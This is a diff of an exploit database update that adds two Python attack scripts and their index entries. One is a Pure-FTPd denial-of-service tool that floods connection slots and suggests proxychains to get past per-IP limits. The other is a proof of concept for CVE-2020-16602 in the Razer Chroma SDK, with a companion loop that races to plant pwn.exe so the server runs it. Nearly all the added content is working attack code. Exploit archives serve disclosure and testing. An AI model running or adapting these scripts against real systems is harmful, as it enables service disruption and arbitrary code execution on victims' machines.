DB: 2020-11-27

2 changes to exploits/shellcodes

Pure-FTPd 1.0.48 - Remote Denial of Service

Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution

exploits/multiple/dos/49105.py

@@ -0,0 +1,99 @@
+# Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service
+# Date: 2020. nov. 26., 09:32:17 CET
+# Exploit Author: xynmaps
+# Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/
+# Software Link: https://github.com/jedisct1/pure-ftpd/
+# Version: 1.0.48
+# Tested on: Parrot Security OS 5.9.0
+
+#encoding=utf8
+#__author__ = XYN/Dump/NSKB3
+#Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3.
+"""
+Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
+you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
+(if it's limited, just run this script from different proxies using proxychains, and it will work)
+"""
+
+import socket
+import sys
+import threading
+import subprocess
+import time
+
+banner = """
+._________________.
+|    Pure-FTPd    |
+|      D o S      |
+|_________________|
+|By XYN/DUMP/NSKB3|
+|_|_____________|_|
+|_|_|_|_____|_|_|_|
+|_|_|_|_|_|_|_|_|_|
+
+"""
+usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
+
+def test(t,p):
+	s = socket.socket()
+	s.settimeout(10)
+	try:
+		s.connect((t, p))
+		response = s.recv(65535)
+		s.close()
+		return 0
+	except socket.error:
+		print("Port {} is not open, please specify a port that is open.".format(p))
+		sys.exit()
+def attack(targ, po, id):
+	try:
+		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+		#print("Worker {} running".format(id))
+	except OSError: pass
+def main():
+	global target, port, start
+	print banner
+	try:
+		target = sys.argv[1]
+	except:
+		print usage
+		sys.exit()
+	try:
+		port = int(sys.argv[2])
+	except:
+		port = 21
+	try:
+		conns = int(sys.argv[3])
+	except:
+		conns = 50
+	print("[!] Testing if {0}:{1} is open".format(target, port))
+	test(target, port)
+	print("[+] Port {} open, starting attack...".format(port))
+	time.sleep(2)
+	print("[+] Attack started on {0}:{1}!".format(target, port))
+	def loop(target, port, conns):
+		global start
+		threading.Thread(target=timer).start()
+		while 1:
+			for i in range(1, conns + 3):
+				t = threading.Thread(target=attack, args=(target,port,i,))
+				t.start()
+				if i > conns + 2:
+					t.join()
+					break
+					loop()
+
+	t = threading.Thread(target=loop, args=(target, port, conns,))
+	t.start()
+
+def timer():
+        start = time.time()
+        while 1:
+                if start < time.time() + float(900): pass
+                else:
+                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+                        t = threading.Thread(target=loop, args=(target, port,))
+			t.start()
+                        break
+
+main()

exploits/windows/remote/49106.py

@@ -0,0 +1,119 @@
+Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution
+Date: 2020-08-13
+Exploit Author: Loke Hui Yi
+Vendor Homepage: https://razerid.razer.com
+Software Link: http://rzr.to/synapse-3-pc-download
+Version: <= v3.12.17
+Tested on: Windows 10
+CVE: CVE-2020-16602
+
+# More info can be found here: 
+# https://www.angelystor.com/2020/09/cve-2020-16602-remote-file-execution-on.html
+# https://www.youtube.com/watch?v=fkESBVhIdIA
+
+# Remote attackers can register applications to the Chroma Server. If the attacker has write access to the ProgramData folder where the Chroma Server stores its data, he can exploit a race condition and get the server to execute a binary of his choosing.
+
+# The code below registers an application to the Chroma Server using a name of the attacker's choosing. 
+
+# The attacker will need to pre-create a folder with the same name as the application to be registered in Razer Chroma SDK\Apps\<appname>, and create an exe file with the same application's name in that folder. The Apps folder is user writable and does not require admin privileges.
+
+# The attacker can keep running the code below to get the Server to execute the file while writing  the payload to the target directory with another process (eg samba or ftp) in order to exploit the race condition.
+
+import requests
+import json
+
+
+def heartbeat(uri):
+    print(uri + '/heartbeat')
+    r = requests.put(uri + '/heartbeat', verify=False)
+    print(r.text)
+
+def keyboard(uri):
+    data = {
+        "effect":"CHROMA_CUSTOM_KEY",
+        "param":{
+            "color":[
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
+                [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535]
+            ],
+            "key":[
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, (16777216 | ~255), (16777216 | ~255), (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), 0, 0, 0, 0, 0],
+                [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), (16777216 | ~16776960), (16777216 | ~16776960), 0, 0, 0, 0]
+            ]
+        }
+    }
+    print(uri + '/keyboard')
+    r = requests.put(uri + '/keyboard', json=data, verify=False)
+    print(r.text)
+
+text="a"
+
+for x in range(20000):
+    text += "a"
+
+pload = {
+    "title": "APPNAME",
+    "description": "description",
+    "author": {
+        "name": "name",
+        "contact": "contact"
+    },
+    "device_supported": [
+        "keyboard",
+        "mouse",
+        "headset",
+        "mousepad",
+        "keypad",
+        "chromalink"],
+    "category": "application"
+}
+server = 'https://chromasdk.io:54236/razer/chromasdk'
+r = requests.post(server, json=pload, verify=False)
+
+json_data = json.loads(r.text)
+
+print(json_data)
+uri = json_data['uri']
+
+heartbeat(uri)
+
+#uri = 'https://chromasdk.io:54236/sid=58487'
+heartbeat(uri)
+
+keyboard(uri)
+
+
+print (json_data['sessionid'])
+
+do_heartbeat = False
+
+if do_heartbeat:
+    sid = 1
+    uri = 'https://chromasdk.io:54236/sid=' + sid
+    heartbeat(uri)
+
+# PoC loop.py for race test
+'''
+import requests
+
+def copyfile(src, dst):
+    with open(src, 'rb') as fsrc:
+        with open(dst, 'wb') as fdst:
+            content = fsrc.read()
+            fdst.write(content)
+
+while True:
+    try:
+        print("copying")
+        copyfile('pwn.exe', 'C:\\ProgramData\\Razer Chroma SDK\\Apps\\pwn\\pwn.exe')
+    except Exception as e:
+        print(str(e))
+'''

files_exploits.csv

@@ -6761,6 +6761,7 @@ id,file,description,date,author,type,platform,port
 48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows,
 48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
+49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -18308,6 +18309,7 @@ id,file,description,date,author,type,platform,port
 49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple,
 49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
 49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
+49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,